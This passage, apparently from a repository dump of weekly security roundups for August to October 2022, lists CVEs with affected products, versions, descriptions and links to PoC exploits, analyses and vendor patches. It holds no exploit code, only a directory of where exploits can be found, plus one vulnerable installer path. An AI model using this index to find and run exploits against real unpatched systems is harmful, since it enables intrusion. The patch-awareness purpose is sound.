The issue is fixed in version 2.3.24.\n\n- [CVE-2020-6369 Patch bypass](https://redrays.io/cve-2020-6369-patch-bypass/)\n    - Target: **CA Introscope Enterprise Manager**\n    - Version Affected :\n                        WILY_INTRO_ENTERPRISE 9.7\n                        WILY_INTRO_ENTERPRISE 10.1\n                        WILY_INTRO_ENTERPRISE 10.5\n                        WILY_INTRO_ENTERPRISE 10.7\n    - Description : CA Introscope Enterprise Manager releases 10.7.0.306 or lower allow unauthenticated attackers to bypass authentication if the administrator has not changed the default passwords for Admin and Guest. This may impact the confidentiality of the service.\n\n - [CVE-2022-36966]\n    - Target: **Orion platform**\n    - Description : CVE-2022-36966 has been assigned as the zero-day for escalation of privilege in the Orion platform. The exploit requires internal + initial access. Details will be shared as SolarWinds provides official feedback. The vulnerability was identified by researcher 'Asim Khan'.\n\n\n - [1day to 0day (CVE-2022-30024) on TP-Link TL-WR841N](https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/)\n    - Target: **TP-Link TL-WR841N devices**\n    - Description : Vulnerabilities on TP-Link TL-WR841N devices: CVE-2020-8423 (data parsing), CVE-2022-24355 (file extension handling) & CVE-2022-30024 (assignment data)\n\n\n - [CVE-2022-27255 POC](https://github.com/infobyte/cve-2022-27255/tree/main/exploits_nexxt)\n    - Target: **Realtek eCos SDK SIP ALG buffer overflow**\n    - Vulnerable Devices : \n               \n               Nexxt Nebula 300 Plus\n               Tenda F6 V5.0\n               Tenda F3 V3\n               Tenda F9 V2.0\n               Tenda AC5 V3.0\n               Tenda AC6 V5.0\n               Tenda AC7 V4.0\n               Tenda A9 V3\n               Tenda AC8 V2.0\n               Tenda AC10 V3\n               Tenda AC11 V2.0\n               Tenda FH456 V2.0\n               Zyxel NBG6615 V1.00\n 
              Intelbras RF 301K V1.1.15\n               Multilaser AC1200 RE018\n               iBall 300M-MIMO (iB-WRB303N)\n               Brostrend AC1200 extender\n               MT-Link MT-WR850N\n               MT-Link MT-WR950N\n               Everest EWR-301\n               D-Link DIR-822 h/w version B\n               Speedefy K4\n               Ultra-Link Wireless N300 Universal Range Extender\n               Keo KLR 301\n               QPCOM QP-WR347N\n               NEXT 504N\n               Nisuta NS-WIR303N (probably V2)\n               Rockspace AC2100 Dual Band Wi-Fi Range Extender\n               KNUP KP-R04\n               Hikvision DS-3WR12-E\n\n    - Description : PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific to the Nexxt Nebula 300 Plus router. For more - https://github.com/infobyte/cve-2022-27255\n\n\n - [CVE-2022-37393 Technical Analysis](https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis)\n    - Target: **Zimbra Collaboration Suite**\n    - Description : We are not aware of active exploitation of CVE-2022-37393 at this time, but it could be very difficult to detect successful exploitation because it grants root access.\n\n\n -  [CVE-2022-21881 POC](https://github.com/theabysslabs/CVE-2022-21881)\n    - Target: **TianfuCup 2021**\n    - Description : POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape the Chrome sandbox \n\n - [CVE-2022-29805 Analysis](https://www.whiteoaksecurity.com/blog/fishbowl-disclosure-cve-2022-29805/)\n    - Target: **Fishbowl**\n    - Version: <2022.4.1.\n    - Description : White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. 
\n        \n - [CVE-2022-37042 Zimbra Authentication Bypass](https://github.com/projectdiscovery/nuclei-templates/pull/5134/files)\n    - Target: **Zimbra**\n    - Description : Nuclei Zimbra: release of the CVE-2022-37042 Zimbra Authentication Bypass Causing RCE non-destructive vulnerability detection template.\n \n</details>\n---\n<details>\n<summary><b> \nCVE's that matter Week 02 -> 9 - 16 Aug 2022\n</b></summary>\n\n - [CVE-2022-27255](https://github.com/infobyte/cve-2022-27255)\n    - Target: **Realtek eCos SDK SIP ALG buffer overflow.**\n    - Description : This repository contains the materials for the talk \"Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.\", which was presented at DEFCON30.\n\n  - [CVE-2022-30216]()\n    - Target: **Windows Server service**\n    - Version: Windows 11/Server 2022 machine.\n    - Description : PoC of the srvsvc auth coerce vulnerability [(CVE-2022-30216) : Authentication coercion of the Windows “Server” service.](https://www.akamai.com/blog/security/authentication-coercion-windows-server-service)\n\n\n  - [CVE-2022-36446 POC](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)\n    - Target: **Webmin**\n    - Version:  < 1.997. \n    - Description : A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin.\n\n - [DashOverright POC]()\n    - Target: **VMware vRealize Operations Manager**\n    - Version :  <= 8.6.3.19682901. \n    - Description : This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901. 
\n                    This exploit chains three vulnerabilities that have been patched:\n                    CVE-2022-31675 - MainPortalFilter ui Authentication Bypass\n                    CVE-2022-31674 - SupportLogAction Information Disclosure\n                    CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation\n\n - [CVE-2021-43908 Analysis](https://blog.electrovolt.io/posts/vscode-rce/)\n    - Target: **Visual Studio Code**\n    - Description: Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)\n \n - [CVE-2022-31101 POC](https://github.com/karthikuj/CVE-2022-31101)\n    - Target: **PrestaShop** is the universal open-source software platform to build your e-commerce solution. \n    - Description: Exploit for PrestaShop blockwishlist module 2.1.0 SQLi \n\n - [CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)\n   - Target: **Apache Commons**\n   - Version: \t2.2.4 to 2.7-2\n   - Description: Apache Commons RCE can use the url, dns and script keywords to connect to any server.\n\n - Microsoft security updates that matter :\n   - [CVE-2022-34715 POC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715) - Description: Windows Network File System Remote Code Execution Vulnerability.\n   - [CVE-2022-30133](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133) - Description: Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (Disable port 1723)\n   - [CVE-2022-34713](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713) - Description: 0-day DogWalk - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\n - [CVE-2020-0796](https://github.com/msuiche/smbaloo)\n    - Target: **Windows ARM64**\n    - Description: A CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows 10 18362 ARM 64-bit (AArch64)\n    \n- [Vulnerabilities in Cisco Small Business 
products](https://pastebin.com/8w2VVXn2)\n   - CVE-2022-20842 \n   - CVE-2022-20827 \n   - CVE-2022-20841\n\n- [Multiple Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software have not been FIXED](https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/)\n   - Cisco ASDM binary packages\n     - CVE-2022-20829 \tNot fixed**  \n     - None (CVE not assigned yet) \tNot fixed\n   - Cisco ASDM (7.17.1.155).\n     - CVE-2022-20651 \tFixed\n   - Cisco ASDM client (fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed). \n     - CVE-2021-1585 CSCvw79912 \tNot fixed**\n   - Cisco ASDM binary package code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585.\n     - CSCwc21296 \tFixed\n   - Cisco ASA-X with FirePOWER Services \n     - CVE-2022-20828 \tFixed in most maintained versions\n   - Cisco FirePOWER module before 6.6.0\n     - CSCvo79327 \tFixed in most maintained versions\n     - >= 7.0. 
Not fixed on ASA.\n   - Cisco ASA with FirePOWER Services \n      - None \tNot fixed\n   - Some Cisco FirePOWER module\n      - None \tNot fixed\n\n </details>\n---\n<details>\n<summary><b> \nCVE's that matter Week 01 -> 2 - 9 Aug 2022\n</b></summary>\n\n - [CVE-2022-36446 Exploit](https://www.exploit-db.com/exploits/50998)\n    - Target: **Webmin**\n    - Version: 1.996\n    - Description: [Remote Code Execution (RCE) Authenticated During Install New Packages.](https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165)\n  \n  - [CVE-2022-2552 Exploit](https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552)\n    - Target: **WordPress Plugin Duplicator**\n    - Version: <=1.4.7\n    - Description : Unauthenticated System Information Disclosure \n    - Proof-of-Concept: 1 - System information.\n                         Some system information is obtained using the \"view\" parameter.\n                         http://[PATH]/backups-dup-lite/dup-installer/main.installer.php\n \n  - [**CVE-2022-29582** - a vulnerability in the io_uring subsystem of the Linux kernel](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/)\n  \n  - [**CVE-2022-35405 Zoho** Password Manager Pro XML-RPC RCE](https://xz-aliyun-com.translate.goog/t/11578?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n\n  - [**CVE-2022-1215 - Analysis**](https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html)\n    - Target: **libinput library**\n    - Version: < 1.20.0\n    - Description: n-day exploit - A format string vulnerability exists in the libinput library, \n    allowing a local attacker to achieve arbitrary code execution in the context of libinput.\n\n- [CVE-2022-34918 LPE POC](https://github.com/veritas501/CVE-2022-34918)\n  - Target: *Linux kernel* (4 Aug 2022) \n  - Version span: v5.8 ~ v5.19 \n  - Description: netfilter nf_tables local privilege escalation analysis \n  \n - [Multiple CVE's on VMware multiple products and a critical (9.8) 
CVE-2022-31656](https://www.vmware.com/security/advisories/VMSA-2022-0021.html)\n   - Target: **VMware**\n   - Version: 21.08.0.1, 21.08.0.0\n   - Description: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.\n  \n- [nex-forms-exploit](https://github.com/ehtec/nex-forms-exploit)\n  - Target: *WordPress plugin* (2nd August 2022)\n  - Versions: <= 7.9.6\n  - Description: Authenticated SQL injection vulnerability in the \"NEX Forms\" WordPress plugin.\n \n- [CVE-2022-2185](https://github.com/star-sg/CVE/tree/master/CVE-2022-2185)\n  - Target: **GitLab**\n  - Version: GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1\n  - Exploit Written By: [Nguyễn Tiến Giang](https://github.com/testanull)\n\n </details>\n"
  },
  {
    "path": "ResetCybersecuirty/CVE's/CVE_Assests/Readme.md",
    "content": "# Security Patched,  CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md\" /> </p>\n<details>\n <summary><b>  \nA collection on latest proof-of-concept exploit scripts and analysis of latest patched CVE. \n  \n  > Why you ask becuase There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited and this will makes you and your organization vulnerable with latest vulnerabilities. \n  \n  \n  - Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow : \n  \n</b></summary>\n\n        \n        # Security Patched within a Week:   Latest IT security vulnerability patched within this week on selected company such as Apple, Google, :\n        # CVE Analysis:                     CVE analysis and poc for analysis.\n        # Poc Exploit :                     Tracking the recetly discovered PoC of old & new CVE. 
\n        \n        - [CVE]\n           - Target/Product: ** **\n           - Affected Version/ Patched :\n           - Description/Issue/Flaw :\n        \n</details>\n\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022\n\n\n \n       Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022).                                      \n                                       featuring releases from Apple, Microsoft, Adobe, GitHub, Google, Linux (Ubuntu, Kali etc), etc.\n        \n       CVE:ANALYSIS & POC:             PoC for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell                                                 \n                                       and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\n         \n       CVE POC (0-Day):                CVE-2021-46422 (Google Chrome), CVE-2022-41852, CVE-2021-45067, PoC for CVE-2022-40684 & Nuclei template,                                                                     \n                                       CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,  \n                                    \n<details>\n<summary>\nSecurity Patched within a Week:\n \n > We track the latest security advisories of top vendors and filter out high and critical vulnerabilities that have been patched within a week.\n</summary>\n \n- *Here’s a look at the latest security issues (Severity : Critical or High) that have been patched by top vendors in the last 2 weeks (12th Oct - 18th October 2022). If you're using an old version of any of the mentioned vendors' products, an attacker could potentially exploit these flaws, for example by tricking you into opening a specially crafted website in a browsing context, so we 
highly recommend **upgrading or updating vendor products from the original source.***\n \n - **Apple security advisory** : \n   - A vulnerability (CVE-2022-22658) was found in Apple iOS up to 16.0.2 (Smartphone Operating System). This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.\n \n - **Google security advisory** : \n   - This week Google released advisories for [Pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and [Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice will be to update these products.\n \n - **Adobe security advisory** : \n   - Adobe has released security updates to address multiple vulnerabilities in Adobe software (ColdFusion, Acrobat and Reader, Adobe Commerce and Magento Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.\n \n - **GitHub security advisory** : \n   - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.\n   - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below. \n \n - Several security issues were fixed in the different versions of **Ubuntu** Linux kernel packages. 
We highly recommend updating & upgrading these packages.\n   - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solution, etc.\n \n   - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems\n\n   - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel 
for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems.\n\n\n - **Microsoft** \n   - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)\n   - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system. [There have been 55+ security issues fixed in Microsoft products, packages & applications](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc.\n\n</details>\n\n<details>\n<summary>\nCVE Analysis, writeups & reports: (6 CVE analyses that matter in the last 1 week)\n \n > Every week, we collect the recently discovered writeups & reports for CVEs.  
\n</summary>\n \n  - Analysis: CVE-2022-40684\n  - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n  - Nuclei template for CVE-2022-40684\n \n     - Vendor : **Fortinet**\n     - Affected :  FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n     - Patched : Apply updates per vendor instructions.\n     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n                                                                        \n  - [Analysis: CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)\n      - Vendor : **Microsoft Products**\n      - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable. \n      - Patched : Apply updates per vendor instructions.\n      - Description : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. 
The potential impact of an exploit of this vulnerability is considered to be very high.\n              \n   - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak)                   \n   - [PoC : CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)\n                                     \n       - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**\n       - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier).\n       - Description/Issue/Flaw : Out-of-bounds read caused by treating an ANSI string as Unicode in Acrobat Reader DC. This vulnerability can be exploited to leak sensitive information from the sandboxed Adobe Reader process.\n \n    - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)\n        - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/) \n        - Target : **vm2 JavaScript sandbox library**\n        - Affected : version < 3.9.11\n        - Description : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.  
\n                                     \n   \n   - [Analysis : CVE-2022-42889 / Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)            \n                                     \n       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.\n       - Description/Issue/Flaw : CVE-2022-42889 Text4Shell is a remote code execution vulnerability in Apache Commons Text software. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect on the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series, and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.\n         \n \n   - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)\n        \n      - Summary :-> [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)\n      - Affected Vendors : \n <img src=\"https://user-images.githubusercontent.com/25515871/195232896-65a359b5-91b4-4dbf-ae64-05b4e8ff3a82.jpg\" width=\"500\" height=\"450\"> \n \n - Description: US authorities (NSA, FBI, CISA) expose the TOP 20 vulnerabilities actively exploited by Chinese state-sponsored attackers, and NSA, CISA, and FBI urge organizations to apply the recommendations below:\n         \n    - Update and patch systems as soon as possible. 
Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.\n    - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n    - Block obsolete or unused protocols at the network edge. \n    - Upgrade or replace end-of-life devices.\n    - Move toward the Zero Trust security model. \n    - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.\n \n</details>\n\n<details>\n <summary> PoC for CVE & Exploit (Total : 5+ new 0-days that matter this week and 4 important ones from last week's CVEs) :\n  \n > Every week we're tracking the recently discovered exploits and PoCs for CVEs.  \n</summary>\n \n   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n       \n       - Target/Product: **Google Chrome**\n       - Affected Version: The PoC maker claims \"All\" but the CVE says version < 80.0.3987.149\n       - Solution : upgrade Google Chrome to the latest version                                                            \n       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n                                                                                      \n   - [PoC CVE-2022-41852 (unofficial)](https://github.com/Warxim/CVE-2022-41852)\n        \n       - Target/Product: **Apache Commons JXPath**\n       - Description : Remote Code Execution in the JXPath library (for example, the methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let users send input into the path parameter), where CVE-2022-41852 allows attackers to execute code on the application server. 
You can read more about this [vulnerability here](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/).\n\n \n - Important **PoC from Last Week** :\n \n   - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)\n        \n       - Target/Product: **Microsoft Exchange Server**\n       - Affected Version: <8.3.1 \n       - Description : ProxyNotShell - CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of a zero-day bug in Microsoft Exchange Server which leads to RCE.\n \n   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)  \n       - Target/Product: **Microsoft Exchange Server**\n       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.   \n                     - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)                     \n \n  - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)\n       - Target/Product: **PS5**\n       - Exploit supports firmwares : 4.03, 4.50, 4.51\n       - Description/Issue/Flaw : PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see the Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. 
This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.\n \n                                                         \n   - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)\n        - Target/Product: **Dropbox**\n        - Description/Issue/Flaw : DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is an exploit for PID Reuse and a Logical Error in Dropbox's XPC service.\n         \n</details>\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022\n\n\n\n \n    Security Patched within a Week:  Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022).                                      \n                                    featuring releases from Microsoft, Adobe, GitHub, Cisco, Linux (Ubuntu, Kali etc), Firefox etc.\n\n    CVE:ANALYSIS & POC:             CVE-2022-34960, CVE-2022-41218, HackerOne report #1672388 - GitLab, CVE-2022-33987,                                               \n                                    CVE-2022-36635 and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\n         \n    CVE POC (0-Day):                Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,                                                                     \n                                    CVE Collection of jQuery UI XSS Payloads, nuclei template for CVE-2022-35405, An updated list of PoCs for CVEs, \n \n                                    PS5-4.03-Kernel-Exploit, CVE-2022-41040, CVE-2022-26726, CVE-2022-30600, CVE-2022-39197, CVE-2021-29156 Exploit,                                               \n                                    CVE-2022-30206, CVE-2022-2992, CVE-2022-41208, 
CVE-2022-2274 and CVE-2022-36804\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21st Sept-27th Sept 2022\n\n \n        Security Patched within a Week: Latest vulnerabilities patched within the week (21st Sep-27th Sep 2022),\n                                        featuring releases from Apple, Google, Microsoft, GitHub, Linux (Ubuntu, Kali etc.), WordPress etc.\n        \n        CVE:ANALYSIS & POC:             CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, CVE-2021-41653, CVE-2022-39205,\n                                        CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n         \n        CVE POC (0-Day):                CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos PoC,\n                                        CVE-2022-23743, Webshell - open source project, Windows10 - Custom Kernel Signers.\n\n<details>\n<summary>\nSecurity Patched within a Week: \n</summary>\n- Here's a look at the latest security issues (severity: Critical or High) patched in the week of 21st Sep-27th Sep 2022. We highly recommend upgrading or updating from the original source.\n \n- **WhatsApp** Security Advisories September update : CVE-2022-36934 (prior to v2.22.16.12) and CVE-2022-27492 (prior to v2.22.16.2).\n- **Node.js** update fixes high-severity flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. 
(Affected v18.x, v16.x, and v14.x)\n- Several security issues were fixed across the different versions of the **Ubuntu** Linux kernel packages.\n  - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.\n  - **Ubuntu 20.04 LTS & Ubuntu 18.04 LTS** : bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4, linux-azure, linux-azure-5.15/5.4, linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.\n\n- **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability CVE-2022-37972](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)\n- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp)\n- **Mozilla** releases security updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).\n- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).\n- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405 (CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)\n- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)\n- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, 
